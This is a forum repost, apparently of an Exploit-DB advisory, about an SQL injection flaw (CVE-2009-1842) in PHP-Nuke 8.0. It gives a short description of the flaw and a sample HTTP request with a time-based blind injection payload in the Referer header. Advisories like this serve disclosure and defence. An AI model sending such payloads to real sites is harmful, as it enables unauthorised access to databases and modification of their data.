Exploit PHP-Nuke 8.0 - '/main/tracking/userLog.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33011
Проверка EDB
  1. Пройдено
Автор
GERENDI SANDOR ATTILA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1842
Дата публикации
2009-05-27
Код:
source: https://www.securityfocus.com/bid/35117/info

PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP-Nuke 8.0.0 is vulnerable; other versions may also be affected.

The following sample request is available:

GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0
Accept: */*
referer: '+IF(False,'',SLEEP(5))+'
 
Источник
www.exploit-db.com

Похожие темы